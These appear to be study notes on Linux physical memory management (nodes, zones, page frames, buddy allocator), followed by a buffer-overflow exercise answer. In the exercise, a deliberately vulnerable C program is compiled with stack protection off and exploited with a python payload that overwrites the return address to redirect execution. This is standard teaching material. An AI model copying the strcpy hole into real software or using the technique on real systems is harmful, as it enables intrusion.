Memory management technic and virtual memory

  • Virtual memory offers maximum sized Virtual Address Space to each Task.

    CPU Size
    32bit 4GB
    64bit 16EB
    • In case of 32bit CPU, Virtual Address Space of a Task does not require the 4GB of Physical memory but takes only as much as the Task uses.
      • More tasks can run with less physical memory
      • No need of memory arrange policy
      • Easy to share or protect memory between tasks
      • Fast task creation

Physical memory management data structure

  • Linux has the information about entire physical memory.
  • UMA(Uniform Memory Access): SMP(Symmetric Multi-Processing)
    • Memory and I/O BUS are shared by entire CPUs
    • Possible bottleneck on the resource
  • NUMA(Non-Uniform Memory Access)
    • For the sake of the performance, each CPU should access to the nearest memory to fetch data.
  • Node
    • Implementation of Bank(Set of memory with the same access speed)
      • Zone structure implemented in “/include/linux/mmzone.h”
      • UMA has one Bank and NUMA has multiple Banks.
    • UMA has one Node
      • The only Node can be accessed with “contig_page_data”
    • NUMA has multiple Nodes.
      • They are managed using list called “pgdat_list”
    • Linux can access the Physical Memory using consistent Node structure no matter what the system is.
      • “pg_data_t” structure is used.
        • “node_present_pages”: actual size of the physical memory in the node
        • “node_start_pfn”: the index number of the physical memory in the memory map
        • “node_zones”: zone structure
        • “nr_zones”: the number of zones
      • For the sake of the performance
        • Linux tends to allocate the nearest memory from the CPU working on the Task.
        • Linux tends to reallocate the CPU which have worked on the same task.

      Bank-Node

  • Zone
    • Some ISA BUS-based devices are necessary to allocate the region under 16MB of the physical memory.
    • Zones are several regions of the physical memory for the Node.
      • “/include/linux/mmzone.h”
    • The memory in the same zone has the same properties.
    • The memory in the different zone should be managed separately.
    Region Zone name Description
    0 ~ 16M ZONE_DMA or ZONE_DMA32 saved for some ISA BUS-based devices
    16 ~ 896M ZONE_NORMAL mapped from the beginning of the Kernel Space in the Virtual Address Space (e.g. 3072 ~ 3968 M for 32bit)
    896 ~ end ZONE_HIGHMEM dynamically allocated as it is needed
    • Zone can be the only one in one Node. (e.g. ARM CPU system with 64MB SDRAM)
    • Zone structure has
      • Beginning address and the size of physical memory belong to the Zone
      • free_area structure array for being used by Buddy
      • “watermark” and “vm_stat” determine appropriate memory freeing policy at memory shortage.
        • On the memory shortage, the processes failed to fetch memory are put into “wait_queue” with hashing on “wait_table” variable.
    $ cat /proc/zoneinfo
    Node 0, zone      DMA
      per-node stats
          nr_inactive_anon 62122
          nr_active_anon 94246
          nr_inactive_file 146827
          nr_active_file 95508
          ...
      pages free     3721
              min      39
              low      48
              high     57
              ...
          nr_free_pages 3721
          nr_zone_inactive_anon 0
          nr_zone_active_anon 0
          ...
      pagesets
          cpu: 0
                  count: 0
                  high:  0
                  batch: 1
      vm stats threshold: 8
          cpu: 1
                  count: 0
                  high:  0
                  batch: 1
          ...
      node_unreclaimable:  0
      start_pfn:           1
    Node 0, zone    DMA32
      pages free     988431
              min      10549
              low      13186
              high     15823
          nr_free_pages 988431
          nr_zone_inactive_anon 0
          nr_zone_active_anon 0
          nr_zone_inactive_file 0
          nr_zone_active_file 0
          ...
      pagesets
          cpu: 0
                  count: 11
                  high:  378
                  batch: 63
      vm stats threshold: 48
          cpu: 1
                  count: 0
                  high:  378
                  batch: 63
                  ...
      node_unreclaimable:  0
      start_pfn:           4096
    Node 0, zone   Normal
      pages free     158188
              min      6306
              low      7882
              high     9458
              spanned  619520
              ...
          nr_free_pages 158188
          nr_zone_inactive_anon 62122
          nr_zone_active_anon 94246
          nr_zone_inactive_file 146827
          nr_zone_active_file 95508
          nr_zone_unevictable 0
          ...
      pagesets
          cpu: 0
                  count: 373
                  high:  378
                  batch: 63
      vm stats threshold: 48
          cpu: 1
                  count: 333
                  high:  378
                  batch: 63
      vm stats threshold: 48
          cpu: 2
                  count: 317
                  high:  378
                  batch: 63
      vm stats threshold: 48
          cpu: 3
                  count: 282
                  high:  378
                  batch: 63
          ...
      node_unreclaimable:  0
      start_pfn:           1048576
    Node 0, zone  Movable
      pages free     0
              min      0
              low      0
              high     0
              spanned  0
              present  0
              managed  0
              protection: (0, 0, 0, 0)
    
  • Page frame
    • Managing unit of physical memory by Zone
    • Page structure implemented in “/include/linux/mm_types.h”
    • Pages are supposed to be created for every page frames when the system boots.
    • Pages can be accessed by the global variable called “mem_map”
  • Linux’s physical memory managing units
    • Physical memory may be composed of one or more Nodes.
    • Node may be composed of one or more Zones.
    • Zone may be composed of many Page frames.

    Node-Zone

Buddy and Slab

  • Linux allocates physical memory to tasks by the “Page frame” unit.
    • At least 4KB, which can be changed to be 8KB, 2MB, etc.
    • External Fragmentation: When task requests bigger size than several page frames and the residual is smaller than one page frame.
    • Internal Fragmentation: When task requests smaller size than one page frame.
  • Buddy Allocator
    • External Fragmentation
    • Implemented through the free_area structure array in the Zone structure (one Buddy for one Zone)
      • free_area structure has
        • free_list
        • map

        free_area

        • The number of free_area will be the number of squares of 2 which calculates the maximum number of page frames for one buddy. (e.g. 4KB, 8KB, 16KB, …, 4MB)
    • Example
      • On 2 pages are requested

        Buddy allocator procedure 1

      • On another 2 pages are requested

        Buddy allocator procedure 2

      • On page 11 are freed

        Buddy allocator procedure 3

    • Lazy Buddy

      Lazy Buddy

      • “free_area::map” -> “free_area::nr_free”: number of free Page frames
      $ cat /proc/buddyinfo
      Node 0, zone      DMA      1      0      0      1      2      1      1      0      0      1      3
      Node 0, zone    DMA32      3      2      4      3      6      4      4      4      3      1    963
      Node 0, zone   Normal     54    244    185    109     41     22      7      3      2      9    145
      
  • Slab Allocator
    • Internal Fragmentation

Exercise 2. Answer: Understanding Stack based buffer overflow

#include <string.h>
#include <stdio.h>

void function2() {
  printf(Execution flow changed\n);
}

void function1(char *str){
  char buffer[5];
  strcpy(buffer, str);  // break point 1.
}                       // break point 2.

void main(int argc, char *argv[])
{
  function1(argv[1]);   // break point 3.
  printf(Executed normally\n);
}
gcc -g -fno-stack-protector -z execstack -o bufferoverflow overflow.c
  • -g tells GCC to add extra information for GDB
  • -fno-stack-protector flag to turn off stack protection mechanism
  • -z execstack, it makes stack executable.
$ ./bufferoverflow AAAA
Executed normally
$ ./bufferoverflow AAAAAAAAAAAAAAAAAAAAAA
Segmentation fault
  • break point 3.

    break point 3.

  • break point 1.

    break point 1.

  • break point 2.

    break point 2.

  • Return address, EBP and ESP on function stack frame

    EBP and ESP on function stack frame

  • break point 3.

    When you overwrite the return address with As you will get segmentation fault with message 0x41414141 in ?? () in GDB. This means you successfully overwritten the return address.

    break point 3.

  • Hijacking Execution

    • Find the function2 address

      function 2 address

    • Overwrite the Return address with the function 2 address

      run with function 2 address

    $ ./bufferoverflow $(python -c 'print "A"*17 + "\x1b\x84\x04\x08"')
    Execution flow changed
    Segmentation fault